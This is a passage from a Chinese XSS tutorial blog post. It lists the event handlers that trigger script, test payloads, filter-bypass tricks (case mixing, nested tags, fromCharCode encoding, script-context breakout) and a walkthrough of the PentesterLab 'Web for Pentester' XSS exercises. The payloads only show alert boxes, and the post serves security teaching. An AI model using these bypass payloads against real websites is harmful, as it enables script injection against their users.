<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://39.97.251.161/usr/uploads/2020/04/449512334.png"</span> <span class="attr">onerror</span>=<span class="string">alert(/DOM</span> <span class="attr">XSS</span>/)/&gt;</span></span><br></pre></td></tr></table></figure>

<p>直接在<code>img</code>标签中插入<code>onerror</code>事件，该语句表示当图片加载出错的时候，自动触发后面的<code>alert()</code>函数，来达到弹窗的效果。</p>
<h2 id="触发标签与属性"><a href="#触发标签与属性" class="headerlink" title="触发标签与属性"></a>触发标签与属性</h2><p><strong>通用总结</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">onerror</span><br><span class="line">onmouseover</span><br><span class="line">onmouseout</span><br><span class="line">onmousemove</span><br><span class="line">onclick</span><br></pre></td></tr></table></figure>

<p><strong>script</strong></p>
<p>通常触发方式</p>
<p><strong>a</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">onmouseover</span><br><span class="line">onmouseout</span><br><span class="line">onmousemove</span><br><span class="line">onclick</span><br></pre></td></tr></table></figure>

<p><strong>img</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">onerror</span><br><span class="line">onmouseover</span><br><span class="line">onmouseout</span><br><span class="line">onmousemove</span><br><span class="line">onclick</span><br></pre></td></tr></table></figure>

<p><strong>div</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">onmouseover</span><br><span class="line">onmouseout</span><br><span class="line">onmousemove</span><br><span class="line">onclick</span><br></pre></td></tr></table></figure>

<h2 id="payloads"><a href="#payloads" class="headerlink" title="payloads"></a>payloads</h2><h3 id="简单粗暴的测试payload"><a href="#简单粗暴的测试payload" class="headerlink" title="简单粗暴的测试payload"></a>简单粗暴的测试payload</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;confirm(1);&lt;&#x2F;script&gt;</span><br><span class="line">&lt;img src&#x3D;1 onerror&#x3D;prompt(1)&gt;</span><br><span class="line">&lt;table background&#x3D;&quot;javascript:confirm(1)&quot;&gt;&lt;&#x2F;table&gt;</span><br><span class="line">&lt;a href&#x3D;&quot;javascript:confirm(1)&quot;&gt;a&lt;&#x2F;a&gt;</span><br><span class="line">&lt;a href&#x3D;&quot;javascrip&amp;#116&amp;#58confirm(1)&quot;&gt;a&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>

<h3 id="过滤测试"><a href="#过滤测试" class="headerlink" title="过滤测试"></a>过滤测试</h3><p><strong>payload - 0</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">zxcv%20script&lt;&gt;&quot;%27</span><br></pre></td></tr></table></figure>

<p><strong>payload - 1</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1);&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload - 2</strong></p>
<p>观察是否存在大小写混淆绕过</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sCript&gt;alert(1);&lt;&#x2F;scRipt&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload - 3</strong></p>
<p>递归构造法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Pent&lt;&lt;est&lt;script&gt;erL&gt;ab&gt;&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload - 4</strong></p>
<p>递归构造法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr&lt;script&gt;ipt&gt;alert(1);&lt;&#x2F;sc&lt;&#x2F;script&gt;ript&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload - 5</strong></p>
<p>查看代码部分的关键词是否被限制了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">alert</span><br></pre></td></tr></table></figure>

<p><strong>payload - 6</strong></p>
<p>测试img标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;1 onerror&#x3D;prompt(1)&gt;</span><br></pre></td></tr></table></figure>

<p><strong>payload - 7</strong></p>
<p>测试div标签</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;div onmouseover&#x3D;alert(1)&gt;1&lt;&#x2F;div&gt;</span><br></pre></td></tr></table></figure>

<h3 id="基本混淆"><a href="#基本混淆" class="headerlink" title="基本混淆"></a>基本混淆</h3><p>大小写混合</p>
<p>宽字节</p>
<h2 id="XSS靶场"><a href="#XSS靶场" class="headerlink" title="XSS靶场"></a>XSS靶场</h2><h3 id="web-for-pentester"><a href="#web-for-pentester" class="headerlink" title="web for pentester"></a>web for pentester</h3><p><strong>官网：</strong><a href="https://pentesterlab.com/" target="_blank" rel="noopener">https://pentesterlab.com/</a></p>
<p><strong>下载地址</strong>：<a href="https://isos.pentesterlab.com/web_for_pentester_i386.iso" target="_blank" rel="noopener">https://isos.pentesterlab.com/web_for_pentester_i386.iso</a></p>
<p><strong>安装方法</strong>：通过虚拟机挂载iso运行，该靶场环境是封装在<code>debian</code>系统里面的，运行在时候直接以<code>Live</code>方式运行，然后<code>ifconfig</code>查看下ip地址，在浏览器输入IP地址即可。</p>
<p><img src="/posts/46185/penter.png" alt></p>
<h4 id="Example-1-–-无任何过滤"><a href="#Example-1-–-无任何过滤" class="headerlink" title="Example 1 – 无任何过滤"></a>Example 1 – 无任何过滤</h4><p><img src="/posts/46185/e1.png" alt></p>
<p><strong>测试</strong></p>
<p><code>name=xss</code>、<code>name=&lt;h1&gt;xss&lt;/h1&gt;</code>观察页面，并查看源代码，发现输出是在标签外，则不需要闭合标签。</p>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">example1.php?name&#x3D;&lt;script&gt;alert(&#39;XSS&#39;)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/46185/e12.png" alt></p>
<h4 id="Example-2-–-大小写绕过"><a href="#Example-2-–-大小写绕过" class="headerlink" title="Example 2 – 大小写绕过"></a>Example 2 – 大小写绕过</h4><p><strong>思路</strong></p>
<ol>
<li><p>和Example 1一样，先随便输入一下数据测试，通过观察结果，可以判断name参数的注入点没有过滤尖括号<code>&lt;&gt;</code>。</p>
</li>
<li><p>用基本语句测试 <code>&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</code>，发现页面中只剩下的<code>alert(&quot;xss&quot;)</code>，<code>&lt;script&gt;&lt;/script&gt;</code>被过滤了，那么就需要绕过过滤。</p>
</li>
<li><p>尝试大小写转换，输入<code>&lt;Script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</code>，发现页面中前一个<code>&lt;Script&gt;</code>没有被过滤，只有后一个<code>&lt;/script&gt;</code>被过滤了</p>
<p><img src="/posts/46185/e2.png" alt></p>
<p>那么大小写是可以绕过过滤的，输入：<code>&lt;Script&gt;alert(&quot;xss&quot;)&lt;/Script&gt;</code></p>
</li>
</ol>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">example2.php?name&#x3D;&lt;Script&gt;alert(&quot;xss&quot;)&lt;&#x2F;Script&gt;</span><br></pre></td></tr></table></figure>

<h4 id="Example-3-–-嵌套绕过"><a href="#Example-3-–-嵌套绕过" class="headerlink" title="Example 3 – 嵌套绕过"></a>Example 3 – 嵌套绕过</h4><p><strong>思路</strong></p>
<ol>
<li>经过上面的测试，没有过滤<code>alert(&#39;xss&#39;)</code>,现在就把注意力集中在 <code>&lt;script&gt;</code> 和<code>&lt;/script&gt;</code>上</li>
<li>使用过滤测试Example 2 payload探测。观察到结果中有一部分尖括号被过滤，但也有部分尖括号未被过滤。</li>
<li>构造payload</li>
</ol>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">example3.php?name&#x3D;&lt;scr&lt;script&gt;ipt&gt;alert(1);&lt;&#x2F;sc&lt;&#x2F;script&gt;ript&gt;</span><br><span class="line">或</span><br><span class="line">example3.php?name&#x3D;&lt;script &gt;alert(1)&lt;&#x2F;script &gt;</span><br></pre></td></tr></table></figure>

<h4 id="Example-4-–-script直接被过滤，用其他标签"><a href="#Example-4-–-script直接被过滤，用其他标签" class="headerlink" title="Example 4 – script直接被过滤，用其他标签"></a>Example 4 – script直接被过滤，用其他标签</h4><p><strong>思路</strong></p>
<p><code>script</code>这个关键词被禁用。考虑用其他标签触发<code>XSS</code>。最常用的还是<code>img</code>标签。<br>除了<code>img</code>标签以外，还可以考虑<code>a</code>标签和<code>div</code>标签等。</p>
<p>触发函数有 <code>onerror</code>, <code>onmouseover</code>, <code>onmouseout</code>, <code>onmousemove</code>, <code>onclick</code>。</p>
<p><strong>payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;1 onerror&#x3D;alert(1)&gt;</span><br><span class="line">&lt;img src&#x3D;1 onerror&#x3D;&#39;alert(1)&#39;&gt;</span><br><span class="line">&lt;img src&#x3D;1 onerror&#x3D;&#39;alert(1)&#39; &#x2F;&gt;</span><br><span class="line">&lt;img src&#x3D;&#39;1&#39; onerror&#x3D;&#39;alert(1)&#39; &#x2F;&gt;</span><br><span class="line">&lt;img src&#x3D;&quot;1&quot; onerror&#x3D;&#39;alert(1)&#39; &#x2F;&gt;</span><br><span class="line">&lt;img src&#x3D;1 onmouseover&#x3D;alert(1)&gt;</span><br><span class="line">&lt;a href&#x3D;1 onmouseover&#x3D;alert(1)&gt;1&lt;&#x2F;a&gt;</span><br><span class="line">&lt;div onclick&#x3D;alert(1)&gt;1&lt;&#x2F;div&gt;</span><br><span class="line">&lt;div onmouseover&#x3D;alert(1)&gt;1&lt;&#x2F;div&gt;</span><br><span class="line">&lt;img src&#x3D;1 onmouseover&#x3D;prompt(1)&gt;</span><br><span class="line">&lt;img src&#x3D;1 onmouseover&#x3D;confirm(1)&gt;</span><br></pre></td></tr></table></figure>

<h4 id="Example-5-–-String-fromCharCode编码绕过"><a href="#Example-5-–-String-fromCharCode编码绕过" class="headerlink" title="Example 5 – String.fromCharCode编码绕过"></a>Example 5 – String.fromCharCode编码绕过</h4><p><strong>思路</strong></p>
<p><code>alert</code>被限制的情况。</p>
<p>绕过思路1,不使用<code>alert</code>而用其他的类似函数,比如<code>confirm</code>和<code>prompt</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;confirm(1)&lt;&#x2F;script&gt;</span><br><span class="line">&lt;script&gt;prompt(1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p>绕过思路2,编码函数名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;eval(String.fromCharCode(97,108,101,114,116,40,49,41))&lt;&#x2F;script&gt;</span><br><span class="line">&lt;script&gt;eval(String.fromCharCode(97,108,101,114,116,40,49,41))&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<h4 id="Example-6-–-—–标签内-闭合标签"><a href="#Example-6-–-—–标签内-闭合标签" class="headerlink" title="Example 6 – —–标签内,闭合标签"></a>Example 6 – <script></script>—–标签内,闭合标签</h4><p>直接注入JavaScript代码中。<br>不闭合<code>script</code>标签的情况，可以考虑用<code>//</code>注释后面的代码</p>
<p>在一个<code>script</code>的标签内，先实现闭合<code>&quot;;alert(1)//,&quot;</code>;用来闭合前面，<code>//</code>注释后面。将<code>hello，hacker</code>的地方写一个<code>alert(1)</code>即可。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;;alert(1)&#x2F;&#x2F;</span><br><span class="line">&quot;;alert(1);var a&#x3D;&quot;</span><br></pre></td></tr></table></figure>

<p>顺带再闭合一下<code>script</code>标签也不是不可以，只是有点多此一举。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;;&lt;&#x2F;script&gt;&lt;script&gt;alert(1)&#x2F;&#x2F;</span><br><span class="line">&lt;&#x2F;script&gt;&lt;script&gt;alert(1)&lt;&#x2F;script&gt;&lt;script&gt;</span><br></pre></td></tr></table></figure>

<h4 id="Example-7-–-标签内—–闭合标签"><a href="#Example-7-–-标签内—–闭合标签" class="headerlink" title="Example 7 – 标签内—–闭合标签"></a>Example 7 – <script></script>标签内—–闭合标签</h4><p>左右尖括号和双引号<code>&lt;,&gt;,&quot;</code>被HTML encoding。<br>如上个例子所述，其实并不需要用到尖括号，并且可以用单引号分割。<br>(用双引号还是单引号分割得看目标页面的代码怎么写，类似于python)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;;alert(1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<h4 id="Example-8-–-有过滤，表单"><a href="#Example-8-–-有过滤，表单" class="headerlink" title="Example 8 – 有过滤，表单"></a>Example 8 – 有过滤，表单</h4><p>对尖括号进行的过滤，转义；<br>有一个表单：输入<code>xxxx</code>点击提交，查看源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">HELLO xxxxx&lt;form action&#x3D;&quot;&#x2F;xss&#x2F;example8.php&quot; method&#x3D;&quot;POST&quot;&gt;</span><br><span class="line">  Your name:&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;name&quot; &#x2F;&gt;</span><br><span class="line">  &lt;input type&#x3D;&quot;submit&quot; name&#x3D;&quot;submit&quot;&#x2F;&gt;</span><br></pre></td></tr></table></figure>

<p>尖括号无法绕过，然后发现表单的url可以被重置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;xss&#x2F;example8.php&#x2F;&#x2F;%22%20onsubmit&#x3D;%22alert(&#39;1&#39;)</span><br></pre></td></tr></table></figure>

<p>然后点击提交，会触发弹窗</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action&#x3D;&quot;&#x2F;xss&#x2F;example8.php&#x2F;&quot; onsubmit&#x3D;&quot;alert(&#39;1&#39;)&quot; method&#x3D;&quot;POST&quot;&gt;</span><br><span class="line">  Your name:&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;name&quot; &#x2F;&gt;</span><br><span class="line">  &lt;input type&#x3D;&quot;submit&quot; name&#x3D;&quot;submit&quot;&#x2F;&gt;</span><br></pre></td></tr></table></figure>

<h4 id="Example-9-–-直接在-后面添加alert-1"><a href="#Example-9-–-直接在-后面添加alert-1" class="headerlink" title="Example 9 – 直接在#后面添加alert(1)"></a>Example 9 – 直接在#后面添加alert(1)</h4><p>DOM型 XSS 的典型代表，恶意输入并没有直接反映在返回的HTML中，而要依赖浏览器动态执行JavaScript之后，恶意输入才能被执行。</p>
<p>把URL改成<code>http://192.168.150.157/xss/example9.php#alert(1)</code><br>首先看到代码里有<code>document.write(location.hash.substring(1));&lt;/script&gt;</code>，所以显然入口在这里。<br><code>document.write()</code>是把括号中的内容写到<code>HTML</code>文档中，<code>location.hash</code>就是得到<code>URL</code>中<code>#</code>开始的字符串，<code>substring(1)</code>就得到了<code>#</code>后的字符串。<br>所以就在#后加入payload：<code>#alert(1)</code></p>

  </div>
</article>


    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="vcomments" class="blog-post-comments"></div>
    <script>
        new Valine({
            el: '#vcomments',
            visitor: true,
            appId: 'euAQjqlW2tS4fVHxsmyLkdLj-gzGzoHsz',
            appKey: 'Fmn6CIIN9yyDif6AC2hxSglA',
            placeholder: 'ヾﾉ≧∀≦)o来啊，快活啊!',
            avatar: 'robohash'
        })
    </script>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://www.sectime.top:8888" target="_blank" rel="noopener">Img</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="http://github.com/mysecroad" target="_blank" rel="noopener">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#什么是XSS"><span class="toc-number">1.1.</span> <span class="toc-text">什么是XSS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS的危害"><span class="toc-number">1.2.</span> <span class="toc-text">XSS的危害</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS分类"><span class="toc-number">2.</span> <span class="toc-text">XSS分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#反射型XSS"><span class="toc-number">2.1.</span> <span class="toc-text">反射型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#实例"><span class="toc-number">2.1.1.</span> <span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#存储型XSS"><span class="toc-number">2.2.</span> <span class="toc-text">存储型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#实例-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DOM型XSS"><span class="toc-number">2.3.</span> <span class="toc-text">DOM型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#实例-2"><span class="toc-number">2.3.1.</span> <span class="toc-text">实例</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#触发标签与属性"><span class="toc-number">3.</span> <span class="toc-text">触发标签与属性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payloads"><span class="toc-number">4.</span> <span class="toc-text">payloads</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#简单粗暴的测试payload"><span class="toc-number">4.1.</span> <span class="toc-text">简单粗暴的测试payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤测试"><span class="toc-number">4.2.</span> <span class="toc-text">过滤测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基本混淆"><span class="toc-number">4.3.</span> <span class="toc-text">基本混淆</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS靶场"><span class="toc-number">5.</span> <span class="toc-text">XSS靶场</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web-for-pentester"><span class="toc-number">5.1.</span> <span class="toc-text">web for pentester</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-1-–-无任何过滤"><span class="toc-number">5.1.1.</span> <span class="toc-text">Example 1 – 无任何过滤</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-2-–-大小写绕过"><span class="toc-number">5.1.2.</span> <span class="toc-text">Example 2 – 大小写绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-3-–-嵌套绕过"><span class="toc-number">5.1.3.</span> <span class="toc-text">Example 3 – 嵌套绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-4-–-script直接被过滤，用其他标签"><span class="toc-number">5.1.4.</span> <span class="toc-text">Example 4 – script直接被过滤，用其他标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-5-–-String-fromCharCode编码绕过"><span class="toc-number">5.1.5.</span> <span class="toc-text">Example 5 – String.fromCharCode编码绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-6-–-—–标签内-闭合标签"><span class="toc-number">5.1.6.</span> <span class="toc-text">Example 6 – —–标签内,闭合标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-7-–-标签内—–闭合标签"><span class="toc-number">5.1.7.</span> <span class="toc-text">Example 7 – 标签内—–闭合标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-8-–-有过滤，表单"><span class="toc-number">5.1.8.</span> <span class="toc-text">Example 8 – 有过滤，表单</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-9-–-直接在-后面添加alert-1"><span class="toc-number">5.1.9.</span> <span class="toc-text">Example 9 – 直接在#后面添加alert(1)</span></a></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://mysecroad.github.io/posts/46185.html" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://mysecroad.github.io/posts/46185.html&text=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://mysecroad.github.io/posts/46185.html&is_video=false&description=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=XSS从0到1&body=Check out this article: http://mysecroad.github.io/posts/46185.html"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://mysecroad.github.io/posts/46185.html&name=XSS从0到1&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://mysecroad.github.io/posts/46185.html&t=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2018-2020
	<img src="https://static.dy208.cn/o_1dfilp8ruo521thr1hvf18ji17soa.png">
	<a href="http://www.beian.miit.gov.cn/"  style="color:#f72b07" target="_blank">豫ICP备20012507号</a>
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://www.sectime.top:8888" target="_blank" rel="noopener">Img</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="http://github.com/mysecroad" target="_blank" rel="noopener">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
